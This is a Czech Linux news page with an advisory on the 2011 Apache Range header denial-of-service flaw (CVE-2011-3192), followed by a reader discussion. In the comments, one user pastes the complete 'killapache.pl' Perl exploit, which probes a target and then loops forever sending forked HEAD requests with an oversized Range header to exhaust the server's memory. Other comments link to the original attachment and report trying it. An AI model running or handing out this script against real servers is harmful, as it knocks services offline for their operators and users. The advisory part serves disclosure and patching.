abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    včera 21:11 | Zajímavý software

    Na stránkách PostgreSQL bylo představeno LibreDB Studio. Jedná se o open-source self-hostované SQL IDE pro (nejenom) PostgreSQL v prohlížeči. Zdrojové kódy jsou k dispozici na GitHubu pod licencí MIT.

    Ladislav Hagara | Komentářů: 2
    včera 16:00 | Nová verze

    Byla vydána nová verze 12.0 media serveru Jellyfin (Wikipedie). Přehled novinek v poznámkách k vydání. Pro vyzkoušení je k dispozici Demo Server. Jellyfin je fork media serveru Emby, původně Media Browser.

    Ladislav Hagara | Komentářů: 0
    včera 04:44 | Bezpečnostní upozornění

    V MikroTik RouterOS bylo nalezeno šest zranitelností společně pojmenovaných MikroTrick umožňujících útočníkovi, pokud má přístup k SSH, získat plnou kontrolu nad zařízením bez nutnosti autentizace. Ve verzích RouterOS 7.25beta3, 7.24.2, 7.23.4 a 6.49.21 je již opraveno.

    Ladislav Hagara | Komentářů: 7
    včera 04:00 | Nová verze

    Byla vydána verze 9.5 open source unixového operačního systému NetBSD (Wikipedie). Přehled novinek v poznámkách k vydání. Jedná se poslední vydání řady NetBSD 9. Doporučen je přechod na NetBSD 11 nebo NetBSD 10.

    Ladislav Hagara | Komentářů: 0
    7.9. 21:44 | IT novinky

    Akční adventura State of Mind je na portále GOG.com zdarma, akce trvá do 10. září.

    ʚĭɞ 🍉 | Komentářů: 1
    7.9. 13:22 | IT novinky

    Na Kickstarteru běží kampaň na podporu malého robotický psa Petoi Quaddle. Postaven je na ESP32-S3. V několika variantách. S řadou senzorů. Programovat lze pomocí Pythonu, C++ nebo i vizuálních bloků. Zkoušet a trénovat lze v simulátoru.

    Ladislav Hagara | Komentářů: 1
    6.9. 22:11 | Pozvánky

    Dětem začala škola a nedobrovolně se tak musí vzdělávat. Avšak pro dospělé, kteří se chtějí vzdělávat nebo naopak se o vědomosti podělit, je tu Virtuální Bastlírna - jako každý měsíc si můžete online a zdarma nezávazně popovídat o vědě a technice nejen s bastlíři, ale i s vývojáři, vědci nebo profesory. A čemu se strahováci budou věnovat? Blíží se KiCAD 11 s nespočtem novinek, z nichž zde musí zmínit alespoň možnost kótování a závislostí z

    … více »
    bkralik | Komentářů: 1
    6.9. 19:33 | Komunita

    Asahi Linux, tj. Linux pro Apple Silicon, oficiálně podporuje čipy M3 (M3, M3 Pro a M3 Max).

    Ladislav Hagara | Komentářů: 9
    6.9. 15:44 | IT novinky Ladislav Hagara | Komentářů: 2
    6.9. 15:00 | IT novinky

    Server SiFive BigSky SF-2U870 2U je založený na jádře SiFive P870-D, zatím je naintegrovaných 32 jader 256 GB RAM 2 GHz, škálovat lze do 256 jader na čip. O něco podrobnější popis serveru v článku SiFive BigSky Ships the First RISC-V Server. Is the GPU Head Node the Prize? na futurumgroup.com. Asi ani tento čip nebude na úrovni nejlepších 64-bit ARMů a AMD Zenů, ale splňuje RVA23 specifikaci a je podporovaný Ubuntu 26.04 LTS a RHEL 10. V článku je

    … více »
    Pavel Píša | Komentářů: 1
    Které desktopové prostředí na Linuxu používáte?
     (10%)
     (7%)
     (4%)
     (21%)
     (29%)
     (7%)
     (6%)
     (2%)
     (14%)
     (21%)
    Celkem 2627 hlasů
     Komentářů: 31, poslední 13.8. 00:27
    Rozcestník

    DoS zranitelnost webového serveru Apache

    Byla objevena DoS zranitelnost webového serveru Apache (Range header DoS vulnerability Apache HTTPD 1.3/2.x, CVE-2011-3192, Bugtraq ID: 49303). V oficiálním bezpečnostním upozornění se uvádí 5 doporučení pro zmírnění dopadů útoků. Oficiální bezpečnostní záplata nebo nová verze webového serveru bude vydána do 48 hodin.

    25.8.2011 19:20 | Ladislav Hagara | Bezpečnostní upozornění


    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    25.8.2011 21:39 NN
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    #By Kingcope
    #Year 2011
    #
    # Will result in swapping memory to filesystem on the remote side
    # plus killing of processes when running out of swap space.
    # Remote System becomes unstable.
    #
    
    use IO::Socket;
    use Parallel::ForkManager;
    
    sub usage {
    	print "Apache Remote Denial of Service (memory exhaustion)\n";
    	print "by Kingcope\n";
    	print "usage: perl killapache.pl <host> [numforks]\n";
    	print "example: perl killapache.pl www.example.com 50\n";
    }
    
    sub killapache {
    print "ATTACKING $ARGV[0] [using $numforks forks]\n";
    =09
    $pm =3D new Parallel::ForkManager($numforks);
    
    $|=3D1;
    srand(time());
    $p =3D "";
    for ($k=3D0;$k<1300;$k++) {
    	$p .=3D ",5-$k";
    }
    
    for ($k=3D0;$k<$numforks;$k++) {
    my $pid =3D $pm->start and next; =09
    =09
    $x =3D "";
    my $sock =3D IO::Socket::INET->new(PeerAddr =3D> $ARGV[0],
                                     PeerPort =3D> "80",
                         			 Proto    =3D> 'tcp');
    
    $p =3D "HEAD / HTTP/1.1\r\nHost: =
    $ARGV[0]\r\nRange:bytes=3D0-$p\r\nAccept-Encoding: gzip\r\nConnection: =
    close\r\n\r\n";
    print $sock $p;
    
    while(<$sock>) {
    }
     $pm->finish;
    }
    $pm->wait_all_children;
    print ":pPpPpppPpPPppPpppPp\n";
    }
    
    sub testapache {
    my $sock =3D IO::Socket::INET->new(PeerAddr =3D> $ARGV[0],
                                     PeerPort =3D> "80",
                         			 Proto    =3D> 'tcp');
    
    $p =3D "HEAD / HTTP/1.1\r\nHost: =
    $ARGV[0]\r\nRange:bytes=3D0-$p\r\nAccept-Encoding: gzip\r\nConnection: =
    close\r\n\r\n";
    print $sock $p;
    
    $x =3D <$sock>;
    if ($x =3D~ /Partial/) {
    	print "host seems vuln\n";
    	return 1;=09
    } else {
    	return 0;=09
    }
    }
    
    if ($#ARGV < 0) {
    	usage;
    	exit;=09
    }
    
    if ($#ARGV > 1) {
    	$numforks =3D $ARGV[1];
    } else {$numforks =3D 50;}
    
    $v =3D testapache();
    if ($v =3D=3D 0) {
    	print "Host does not seem vulnerable\n";
    	exit;=09
    }
    while(1) {
    killapache();
    }
    
    NN
    25.8.2011 21:43 NN
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110820/848b4dca/attachment.obj
    25.8.2011 22:09 aa
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Utoci to a... nic sa nedeje. Aspon na mojom serveri.
    MMMMMMMMM avatar 25.8.2011 22:28 MMMMMMMMM | skóre: 44 | blog: unstable | Valašsko :-)
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Host does not seem vulnerable (to vidím zase já, když "útočím" na své servery)
    25.8.2011 22:38 aa
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Skus nejaky vacsi subor, potom to bude posielat po 50 paketoch a nic z toho.
    pepe_ avatar 25.8.2011 22:43 pepe_ | skóre: 48
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru

    A funguje to i s lighttpd/mysql/php5 s cgifixem ?

    26.8.2011 19:07 Ladislav Hagara | skóre: 107 | blog: Ride the Raven
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Aktualizace bezpečnostního upozornění.
    Problémem je nejenom 'Range' header ale také 'Range-Request' header.
    Oficiální bezpečnostní záplata nebo nová verze webového serveru bude vydána snad do 24 hodin.
    Otto Šabart avatar 27.8.2011 01:10 Otto Šabart | skóre: 13 | blog: KatiePC blog
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Exploit vyšel na exploit-db.com už před 8 dny... No zkoušel jsem ho a také mi nefunguje.
    *´¨)¸.·´¨)¸.·***·>>> www.seberm.com

    Založit nové vláknoNahoru


    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.